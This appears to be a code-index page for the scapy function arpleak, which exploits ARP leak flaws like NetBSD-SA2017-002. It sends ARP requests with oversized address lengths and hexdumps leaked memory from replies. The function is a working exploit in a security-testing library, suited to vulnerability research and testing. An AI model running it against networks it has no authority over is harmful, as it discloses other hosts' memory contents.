MCPcopy Index your code
hub / github.com/secdev/scapy / arpleak

Function arpleak

scapy/layers/l2.py:1233–1283  ·  view source on GitHub ↗

Exploit ARP leak flaws, like NetBSD-SA2017-002. https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc

(target, plen=255, hwlen=255, **kargs)

Source from the content-addressed store, hash-verified

1231
1232@conf.commands.register
1233def arpleak(target, plen=255, hwlen=255, **kargs):
1234 # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList]
1235 """Exploit ARP leak flaws, like NetBSD-SA2017-002.
1236
1237https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc
1238
1239 """
1240 # We want explicit packets
1241 pkts_iface = {} # type: Dict[str, List[Packet]]
1242 for pkt in ARP(pdst=target):
1243 # We have to do some of Scapy's work since we mess with
1244 # important values
1245 iface = conf.route.route(pkt.pdst)[0]
1246 psrc = get_if_addr(iface)
1247 hwsrc = get_if_hwaddr(iface)
1248 pkt.plen = plen
1249 pkt.hwlen = hwlen
1250 if plen == 4:
1251 pkt.psrc = psrc
1252 else:
1253 pkt.psrc = inet_aton(psrc)[:plen]
1254 pkt.pdst = inet_aton(pkt.pdst)[:plen]
1255 if hwlen == 6:
1256 pkt.hwsrc = hwsrc
1257 else:
1258 pkt.hwsrc = mac2str(hwsrc)[:hwlen]
1259 pkts_iface.setdefault(iface, []).append(
1260 Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt
1261 )
1262 ans, unans = SndRcvList(), PacketList(name="Unanswered")
1263 for iface, pkts in pkts_iface.items():
1264 ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs)
1265 ans += ans_new
1266 unans += unans_new
1267 ans.listname = "Results"
1268 unans.listname = "Unanswered"
1269 for _, rcv in ans:
1270 if ARP not in rcv:
1271 continue
1272 rcv = rcv[ARP]
1273 psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc)
1274 if plen > 4 and len(psrc) > 4:
1275 print("psrc")
1276 hexdump(psrc[4:])
1277 print()
1278 hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc)
1279 if hwlen > 6 and len(hwsrc) > 6:
1280 print("hwsrc")
1281 hexdump(hwsrc[6:])
1282 print()
1283 return ans, unans

Callers

nothing calls this directly

Calls 15

get_if_addrFunction · 0.90
get_if_hwaddrFunction · 0.90
inet_atonFunction · 0.90
mac2strFunction · 0.90
SndRcvListClass · 0.90
PacketListClass · 0.90
srpFunction · 0.90
hexdumpFunction · 0.90
ARPClass · 0.85
EtherClass · 0.85
itemsMethod · 0.80
get_fieldMethod · 0.80

Tested by

no test coverage detected